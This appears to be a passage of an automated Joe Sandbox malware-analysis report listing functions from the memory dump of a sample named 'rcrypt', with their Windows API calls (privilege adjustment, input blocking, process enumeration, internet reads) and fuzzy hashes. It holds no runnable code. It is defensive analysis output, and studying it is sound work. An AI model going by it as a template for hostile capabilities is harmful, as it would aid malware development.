Instruction Fuzzy Hash: 35228C715083019FC724DF24C891BAFB7E9BF98304F10491DF99697292DBB1EA45CB92

Function 0016F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0016F151
Process32FirstW.KERNEL32(00000000,?), ref: 0016F15F

Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82

Process32NextW.KERNEL32(00000000,?), ref: 0016F21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0016F22E

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: db1fba1edec47b55ef8f1acb08738bf0c025d9bb8af8502d544e8d4c9da7b0cb
Instruction ID: 274321712118072de79bc8329ab95fed2b07f1756ec124b41d1d4abbae349196
Opcode Fuzzy Hash: db1fba1edec47b55ef8f1acb08738bf0c025d9bb8af8502d544e8d4c9da7b0cb
Instruction Fuzzy Hash: 94518D715083159FD310EF24DC85EABBBE8FF98710F14482DF69597292EB70A909CB92

Function 0014EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0014EB19

Strings

|, xrefs: 0014EB49
(, xrefs: 0014EB5F

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: ab39b17514af6d47d9fe33c6ae082401d30434c48587a3457193cae2e9e6c5c4
Instruction ID: 9e87bc5e71011d41c63e80f82f46d43fdcf627147b677e579ad8bc93ff15f185
Opcode Fuzzy Hash: ab39b17514af6d47d9fe33c6ae082401d30434c48587a3457193cae2e9e6c5c4
Instruction Fuzzy Hash: 2E321775A047059FD728CF29C481A6AB7F1FF48320B15C56EE89ADB3A1D770E981CB44

Function 001625E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 001626D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0016270C

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 016a2a800cb33cc383d8f559d287ac9f56b917d0c05558b43003d8b006d3b71f
Instruction ID: 8b464b793dc7c449bc065f7d5f0e3c7ba0c8e3489288c0db339e7e8af976e6cb
Opcode Fuzzy Hash: 016a2a800cb33cc383d8f559d287ac9f56b917d0c05558b43003d8b006d3b71f
Instruction Fuzzy Hash: FB411771A00A09BFEB24DE94DC85EFBB7BCEB50714F10406EFA05A6140EB709E91D760

Function 0015B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0015B5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0015B608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0015B655

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 9dd55ce0aebda7f89c73317ba5a0b421fc1a4bd9a7a6c018c6f100523cdd54a3
Instruction ID: 36608a5ca2e74c71e4ab356768b1471a4e2ca29a70234a9fcaa941a7fc2182ad
Opcode Fuzzy Hash: 9dd55ce0aebda7f89c73317ba5a0b421fc1a4bd9a7a6c018c6f100523cdd54a3
Instruction Fuzzy Hash: F7216235A00518EFCB00DF55D8C0AEEBBB8FF49315F1480A9E905AB351DB319955CF51

Function 00148CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00110FF6: std::exception::exception.LIBCMT ref: 0011102C
Part of subcall function 00110FF6: __CxxThrowException@8.LIBCMT ref: 00111041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00148D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00148D3A
GetLastError.KERNEL32 ref: 00148D47

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: b2906d3aeaeb542e7a5c492f859fe8935f9a8d9664d8a2bacfb8af4301423f18
Instruction ID: 1904090443c1ae80697089d131cd8c16786bc6637c2feeea800dd2f39aeb5839
Opcode Fuzzy Hash: b2906d3aeaeb542e7a5c492f859fe8935f9a8d9664d8a2bacfb8af4301423f18
Instruction Fuzzy Hash: 6A1194B1814205AFD728DF64DC85D7BB7BDFF48710B20852EF45597651DB70AC81CA60

Function 00154021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0015404B
DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00154088
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00154091

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: bce14696c9748ce234a056fe62529f80d686801cea1d51ff7f9319e30ab6f4ff
Instruction ID: 86ccee5daf21431630e83a6a79e8d02ad4904c9344a31655016747c7ff63eded
Opcode Fuzzy Hash: bce14696c9748ce234a056fe62529f80d686801cea1d51ff7f9319e30ab6f4ff
Instruction Fuzzy Hash: B51173B1904224FFE7109BE9DC44FABBBBCEB08715F100656BE14E7191C3B4598587A1

Function 00154C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00154C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00154C43
FreeSid.ADVAPI32(?), ref: 00154C53

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 444fcc7a2acc07a7c88c292339cba883f4d3c385d0e8c4da67a5a63abcf46fb3
Instruction ID: 9a719a225fee0b071a42c677bc50527df81975bded5a5eeb1ac5df9fedc3f284
Opcode Fuzzy Hash: 444fcc7a2acc07a7c88c292339cba883f4d3c385d0e8c4da67a5a63abcf46fb3
Instruction Fuzzy Hash: E3F04975A1130CBFDF04DFF0DC89EAEBBBDEF08201F1044A9A905E2681E7706A848B50

Function 000FE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d97fe9a966e523c66138ef0fd31eb15a18308065a44f1a9e129c9491221bd96
Instruction ID: 1063cc90c5099ea442b138d236bfe9669b8ee53c3bc287894088e9ccc890495b
Opcode Fuzzy Hash: 4d97fe9a966e523c66138ef0fd31eb15a18308065a44f1a9e129c9491221bd96
Instruction Fuzzy Hash: 7622C070A0025ACFDB24DF54C484ABEF7F1FF08300F148169EA569B7A2E774A985DB91

Function 0015C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0015C966
FindClose.KERNEL32(00000000), ref: 0015C996

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c563c63f19a32f5aef2ee0f4be7607a919327667cd53fac7fcbe35a124511606
Instruction ID: ae24b8e01d402a4fbd88bbfbb96b1ef71915774ff8aca9ce172851addddf8ef2
Opcode Fuzzy Hash: c563c63f19a32f5aef2ee0f4be7607a919327667cd53fac7fcbe35a124511606
Instruction Fuzzy Hash: E211A1326046049FD710EF29C845A6AF7E9FF84324F00851EF9A9DB6A1DB30AC05CB81

Function 0015A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0016977D,?,0017FB84,?), ref: 0015A302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0016977D,?,0017FB84,?), ref: 0015A314

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: f5b9dc51dbfc37b795a1395ec0184a0544ae97160acc604412a522b9e09c52b1
Instruction ID: de1df1346027cc56e0d769781144c29e206773aafb7ed222c8e04ac7cb25b811
Opcode Fuzzy Hash: f5b9dc51dbfc37b795a1395ec0184a0544ae97160acc604412a522b9e09c52b1
Instruction Fuzzy Hash: F4F0823558422DFBDB109FA4DC48FFA777DBF08761F004269B918D6191D7309984CBA1

Function 00148713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00148851), ref: 00148728
CloseHandle.KERNEL32(?,?,00148851), ref: 0014873A

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 966c24b14c8722628be38da2201026b6269fd5ad70b96e1274b203e2a5f00c32
Instruction ID: 687d691659d3fd9171307c33bdcb876d9b85622b23351cf5352085a5a2b7ac49
Opcode Fuzzy Hash: 966c24b14c8722628be38da2201026b6269fd5ad70b96e1274b203e2a5f00c32
Instruction Fuzzy Hash: EDE0B676410610EEE7252B60EC09DB7BBA9FF04351724883DB59A80870DB62ACD1DB10

Function 0011A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00118F97,?,?,?,00000001), ref: 0011A39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0011A3A3

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b121a1f065a65c3cbe8ddea3d368a7ad0cc6f8e19172c871d611dd02929f4225
Instruction ID: b53b0e3d924f9c662c30b8e4fbdf5d7ec688f4c1689bdabe38d565b2d622b509
Opcode Fuzzy Hash: b121a1f065a65c3cbe8ddea3d368a7ad0cc6f8e19172c871d611dd02929f4225
Instruction Fuzzy Hash: D5B09231054208ABCA006B91EC09B8A3F78FB44AAAF404024F60D84860CB6254D2CA91

Function 0011F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77f64afd48677a9bfc06021ff151fc2bd28d8c291709453a256477bfe871360e
Instruction ID: 3991468a016a5642fbb59d580b1e221e24a2de296168c2656871e9ec03e6e5ef
Opcode Fuzzy Hash: 77f64afd48677a9bfc06021ff151fc2bd28d8c291709453a256477bfe871360e
Instruction Fuzzy Hash: B1320235D29F014DD7279634D872335A24AAFB63C4F25D73BE82AB5DA6EB28C5C34200

Function 0012267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59eef11c1d41e5754c05697240fe589472d6bd36c015f358f96e977021c8f765
Instruction ID: e9bc40983dcc7cc4185c3a7ecc29f26b64438e47b235fcae44ceed001de81293
Opcode Fuzzy Hash: 59eef11c1d41e5754c05697240fe589472d6bd36c015f358f96e977021c8f765
Instruction Fuzzy Hash: F3B1DF30D2AF514EE62396398831336BA4CAFBB2C5B95D71BFC1674D22EB2186C34241

Function 00158B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00158B25

Part of subcall function 0011543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,001591F8,00000000,?,?,?,?,001593A9,00000000,?), ref: 00115443
Part of subcall function 0011543A: __aulldiv.LIBCMT ref: 00115463

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 2eefae703324a28df988eab54e00312efe712596f29f92801863a521c21c90b7
Instruction ID: cd2eef8bed27d09e42c12f0ffe7310765658b9b5dd774fa222aa434f563fbb8b
Opcode Fuzzy Hash: 2eefae703324a28df988eab54e00312efe712596f29f92801863a521c21c90b7
Instruction Fuzzy Hash: A321D272625510CBC729CF29D841A52B3E5EBA4311B288F6CD4F5CF6D0CB74B945CB94

Function 001641FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00164218

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 82b5ab5684f0b5248f26242d4e4046657ed65050ca1941d9ce6f47e2a82dbbf1
Instruction ID: cfb7b24843a65c0ed0c34d5152614bdd639ea35df46b72d66009b24809ae25ef
Opcode Fuzzy Hash: 82b5ab5684f0b5248f26242d4e4046657ed65050ca1941d9ce6f47e2a82dbbf1
Instruction Fuzzy Hash: 66E04F352402189FC710EF59E844A9AFBE8AF94761F11802AFE49C7752DB70E8918BE1

Function 00154EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00154EEC

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 7a80ca92a73635bea51cd906987905895115b9ec0d4b3b25d60fbcc1933a59a9
Instruction ID: dace37bc5cd4577826e5b070b8aa5b863667fa55caf69bf010e13b1c567ae734
Opcode Fuzzy Hash: 7a80ca92a73635bea51cd906987905895115b9ec0d4b3b25d60fbcc1933a59a9
Instruction Fuzzy Hash: 05D01798160604ABE82C8B24985FA770208F30078BF94514AB9628D0C19AB86CE96020

Function 00148C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,001488D1), ref: 00148CB3

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 5a528cf38021a9c1b81c1bb16df2d41aeb30bad5fedccbfbcb2f4d2370150f1c
Instruction ID: b3bd709360f829aff1a2ea6e1770c60196c3efbb2ebe83e26b96c1129452b047
Opcode Fuzzy Hash: 5a528cf38021a9c1b81c1bb16df2d41aeb30bad5fedccbfbcb2f4d2370150f1c
Instruction Fuzzy Hash: D0D05E3226450EABEF018EA4DC05EAF3B6AEB04B01F508111FE15C61A1C775D835AB60

Function 00132230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00132242

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 2925a2691877c190fbd7d696404bdee58cd817ff4f9438586f390aaabfba33d7
Instruction ID: 62c0f52ac1b9b73e4ac22021a72ce0e5dca43a30817e1c2eb4f9457d0ec20328
Opcode Fuzzy Hash: 2925a2691877c190fbd7d696404bdee58cd817ff4f9438586f390aaabfba33d7
Instruction Fuzzy Hash: B1C04CF1800109DBDB05DB90D988DEFB7BCAB04315F104055A105F2100D7749B848A71

Function 0011A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0011A36A

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
